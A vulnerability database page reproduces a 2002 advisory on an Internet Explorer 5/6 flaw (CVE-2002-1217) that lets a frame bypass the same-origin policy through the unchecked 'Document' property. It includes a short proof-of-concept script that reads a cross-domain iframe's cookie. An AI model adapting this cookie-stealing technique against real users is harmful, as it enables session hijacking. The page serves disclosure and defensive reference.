Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access

Related Vulnerabilities: CVE-2002-1217  
Publish Date: 15 Oct 2002
Author: GreyMagic Software
Source / Download Exploit 
                source: http://www.securityfocus.com/bid/5963/info

Microsoft Internet Explorer (MSIE) is prone to a vulnerability that may enable a frame or iframe to gain unauthorized access to the Document Object Model (DOM) of other frames/iframes in a different domain. This is possible because MSIE does not perform adequate access control checks on all frame properties. While access to the 'document' property across domains is properly restricted, access to 'Document' is not. This may allow an attacker to violate the browser Same Origin Policy and gain unauthorized access to the properties of frames and iframes that are in a different domain. 

<script language="jscript">
onload=function () {
    // Timer necessary to prevent weird behavior in some conditions
    setTimeout(
        function () {
            alert(document.getElementById("oVictim").Document.cookie);
        },
        100
    );
}
</script>
<iframe src="http://example.com" id="oVictim"></iframe>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started